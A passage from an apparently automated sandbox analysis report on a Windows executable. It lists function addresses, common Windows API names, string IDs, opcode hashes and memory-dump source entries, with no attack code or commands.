                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Message$CapturePost$PeekRelease
                                                                            • String ID:
                                                                            • API String ID: 1125932295-0
                                                                            • Opcode ID: d8263449a7fb442675c9d741cab950380fa11c9e75b3426798dc8e7197357012
                                                                            • Instruction ID: 5d02b2e5aeb4ec6323ff46e37a644a6dd1223255cbe4017dda4c35c19399c0ee
                                                                            • Opcode Fuzzy Hash: d8263449a7fb442675c9d741cab950380fa11c9e75b3426798dc8e7197357012
                                                                            • Instruction Fuzzy Hash: A911CE75714A44C3FB669B26E45CBEA27A0FB98F89F144421EB090BBA4DF7AC0458700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001401765F0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Global$LockUnlock$Create
                                                                            • String ID:
                                                                            • API String ID: 2536725124-0
                                                                            • Opcode ID: b67141e3bf310ce8c3183a6580bfba82ba2fd196d246686b3223bcafde6c3290
                                                                            • Instruction ID: 9bf65c80c243d2947aad802d16c53bfb16b678dac986c884952ca76357a75eff
                                                                            • Opcode Fuzzy Hash: b67141e3bf310ce8c3183a6580bfba82ba2fd196d246686b3223bcafde6c3290
                                                                            • Instruction Fuzzy Hash: 1301967560065291EE569B17B5087B9A6A1FB4CFC4F485131EF564BBA4EF78C4618300
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014007E668 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$Enter$DeleteGdiplusLeaveObjectShutdown
                                                                            • String ID:
                                                                            • API String ID: 1513102227-0
                                                                            • Opcode ID: 0e360754b3e48e207428f9a00453984f0f9454791f566dbbd724859b76125381
                                                                            • Instruction ID: 45943e9ef716b7f4e15b87a25d160d47b76fd9731fdf721eca04ffd95ca445bc
                                                                            • Opcode Fuzzy Hash: 0e360754b3e48e207428f9a00453984f0f9454791f566dbbd724859b76125381
                                                                            • Instruction Fuzzy Hash: DD115EB3611B408AEB1A8F1AD4583A873B0F71CFAAF284224DB59062F1CF79C457C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400FA548 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 292COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: _cwprintf_s_l
                                                                            • String ID: %TsDockingManager-%d$DockingManagers$DockingPaneAndPaneDividers
                                                                            • API String ID: 2941638530-3268659044
                                                                            • Opcode ID: 4c255b5e472967f488ec0f570d514c4a4ca3571553bc1625989048124cd51aba
                                                                            • Instruction ID: aac6bd995a9fb194411c899c494d488cf7025fbf814ea5ce4df0bd781e66ace9
                                                                            • Opcode Fuzzy Hash: 4c255b5e472967f488ec0f570d514c4a4ca3571553bc1625989048124cd51aba
                                                                            • Instruction Fuzzy Hash: 9EC1BD76304A8181EA12EB53D9547ED6361FB8EFD0F498116EF1987BA6DFB8C806D700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001401E8804 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: _invalid_parameter_noinfo
                                                                            • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                            • API String ID: 3215553584-1196891531
                                                                            • Opcode ID: b79c1ce8a429e0b66a6544085a6236cdf389af3687e59af8b6394c484bebcf27
                                                                            • Instruction ID: c0a9294e6d4346c1a3f67ca44e4fac307cbccb19a29dc722445e99621795f1c3
                                                                            • Opcode Fuzzy Hash: b79c1ce8a429e0b66a6544085a6236cdf389af3687e59af8b6394c484bebcf27
                                                                            • Instruction Fuzzy Hash: 19817B32A04240C6FBA79F2786503BD7AE0A399F68F598015CF0A572F6D379CC41D782
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140030510 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 152COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                            • String ID: Recursive entity definition for: $gfffffff
                                                                            • API String ID: 3668304517-697489208
                                                                            • Opcode ID: c4bddffb418cb735dc49f0f7ab2d62f77a0bb42a140bfa10506b6b84829f33ba
                                                                            • Instruction ID: c217215b0171af6f35a97944a6e4d17c1b4ec7e5666e7be4432ccc6bdbd03447
                                                                            • Opcode Fuzzy Hash: c4bddffb418cb735dc49f0f7ab2d62f77a0bb42a140bfa10506b6b84829f33ba
                                                                            • Instruction Fuzzy Hash: F761BC72B11B848AFB16CF2AD4643EA6361F388B88F105622EB5D47BA6DB74D591C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014006C47C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 147memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: AllocString
                                                                            • String ID: PropertyList
                                                                            • API String ID: 2525500382-1939653111
                                                                            • Opcode ID: 3faf94d71e80f1478992db4a136def932922b0fe98b92a44b49204166f86ff1f
                                                                            • Instruction ID: c72fce3bcaa23bb463ab5578e94afb1babfc51d696dc03cb5461d92425b646ed
                                                                            • Opcode Fuzzy Hash: 3faf94d71e80f1478992db4a136def932922b0fe98b92a44b49204166f86ff1f
                                                                            • Instruction Fuzzy Hash: 4A518D76B01B4086EB06DB6ADC447ED23A1B74CBE4F294516EF2E477A5DF38C8818780
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400883D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ConditionMask$EllipseInflateInfoMetricsRectSystemVerifyVersion
                                                                            • String ID: Gu,$mmm
                                                                            • API String ID: 1790378709-3474039531
                                                                            • Opcode ID: 62884d79be09f67ee8f4a0c25619cdc319221ecd924989925caa86a780ebf8fc
                                                                            • Instruction ID: d8e9d0f1acfb1d7d0612520b0b4e3a5b36232aaca3fc92e2160c1ac1b4bf7794
                                                                            • Opcode Fuzzy Hash: 62884d79be09f67ee8f4a0c25619cdc319221ecd924989925caa86a780ebf8fc
                                                                            • Instruction Fuzzy Hash: 9C516972B009018AF722EB67E855BE937A0B78DBD9F404125AF0997BF5DB38CA418744
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400CA244 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: swprintf
                                                                            • String ID: - $:%d
                                                                            • API String ID: 233258989-2359489159
                                                                            • Opcode ID: 08840d8dfa70003b550151291fcf92dcb25a38b9b4caa654382f718df04a7c38
                                                                            • Instruction ID: c963702b7b0add91584321f51334006090b3a8adb79899bd24cefbf24ac60a9e
                                                                            • Opcode Fuzzy Hash: 08840d8dfa70003b550151291fcf92dcb25a38b9b4caa654382f718df04a7c38
                                                                            • Instruction Fuzzy Hash: E4519C72310A8086EB66EB73E4657DD3361A749BD8F804122AF1D57BE6DF38D906C380
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140004600 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 84windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: FormatFreeLocalMessage
                                                                            • String ID: : $System error : 0x
                                                                            • API String ID: 1427518018-205398988
                                                                            • Opcode ID: a819ebb1ede2506ad0eb4f9736366998c48c740a0145a6801198ebcc4d66454c
                                                                            • Instruction ID: 18df93e3c1752428e578bd6693b4c269b6c4787c5d1d1bc6d59e220bef9140a0
                                                                            • Opcode Fuzzy Hash: a819ebb1ede2506ad0eb4f9736366998c48c740a0145a6801198ebcc4d66454c
                                                                            • Instruction Fuzzy Hash: 21317EB2208B8082D765DB16F85539AB3E5F789BC0F840126FBC983769DF78C455CB41
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014003C730 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$ActivateDeactivateDebugOutputString
                                                                            • String ID: GetFileTitleW
                                                                            • API String ID: 2188249819-1191607377
                                                                            • Opcode ID: eb19d030965a60717eacb0907aaeeb8720e634dba8e1425d4df6020535d598f9
                                                                            • Instruction ID: c0a536d83d5f6cdd6a6a5fcc8be83461aac8cb00dcaf585e5fc6039254c30efb
                                                                            • Opcode Fuzzy Hash: eb19d030965a60717eacb0907aaeeb8720e634dba8e1425d4df6020535d598f9
                                                                            • Instruction Fuzzy Hash: 7121B73522475081FA539B639884BEB67E0B74CBE4F09112AEF45477F0CB78C895CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400480C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$ActivateDeactivateDebugOutputString
                                                                            • String ID: InitCommonControlsEx
                                                                            • API String ID: 2188249819-2357626986
                                                                            • Opcode ID: 8a8f791d908e9920c920ebe4a965ee62f154713c2806bdc3c8897a65e8c8c6ea
                                                                            • Instruction ID: ce367025351476cd4355b3dafe5d4d5b70f0518a898d126a46a34ee0825dfc16
                                                                            • Opcode Fuzzy Hash: 8a8f791d908e9920c920ebe4a965ee62f154713c2806bdc3c8897a65e8c8c6ea
                                                                            • Instruction Fuzzy Hash: B321513564474092FA629B57A8443D9A2E8A79CBD0F0A043ADF49477F0DFB8C882C784
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400562FC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$ActivateDeactivateDebugOutputString
                                                                            • String ID: GetOpenFileNameW
                                                                            • API String ID: 2188249819-1384924626
                                                                            • Opcode ID: 402d856f5eb8a98f2f6c6a4f564cd52286ab4389c82b0ef306f7586e10b6164a
                                                                            • Instruction ID: 844cb2a4671fa5eb6d5128c4761d071af7cc273e9f11dd3f7841f35974a10973
                                                                            • Opcode Fuzzy Hash: 402d856f5eb8a98f2f6c6a4f564cd52286ab4389c82b0ef306f7586e10b6164a
                                                                            • Instruction Fuzzy Hash: F0214D36601B4186FB53DB67E8447E9A3E0A79CBD0F590029AB49473F4DFB9C981CB80
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400563C4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$ActivateDeactivateDebugOutputString
                                                                            • String ID: GetSaveFileNameW
                                                                            • API String ID: 2188249819-611885661
                                                                            • Opcode ID: fede27d4b8bc1e01c3b38b05bd3f39b046a3f0be9c2bd6bcddbf3964f209a283
                                                                            • Instruction ID: d775493eedad26ea164f079b74b2b74102affa13a4f6fb4bb6ff922810bc0f1b
                                                                            • Opcode Fuzzy Hash: fede27d4b8bc1e01c3b38b05bd3f39b046a3f0be9c2bd6bcddbf3964f209a283
                                                                            • Instruction Fuzzy Hash: EA21813524070082FA53DB67A4443E963E0E79CBD0F484129EB49477F5DF79C886CB80
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140036568 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            • IsolationAware function called after IsolationAwareCleanup, xrefs: 0000000140036581
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ActivateDebugErrorLastOutputString
                                                                            • String ID: IsolationAware function called after IsolationAwareCleanup
                                                                            • API String ID: 2396347390-2690750368
                                                                            • Opcode ID: ab8f0232e0cf3400e01600403f30409ece02e0b2b4268008a1f0eee4b1d6d50b
                                                                            • Instruction ID: 6af9db88415629e5b2b4bf4289af5a707923620bd19128924b4c6296adfc6ee1
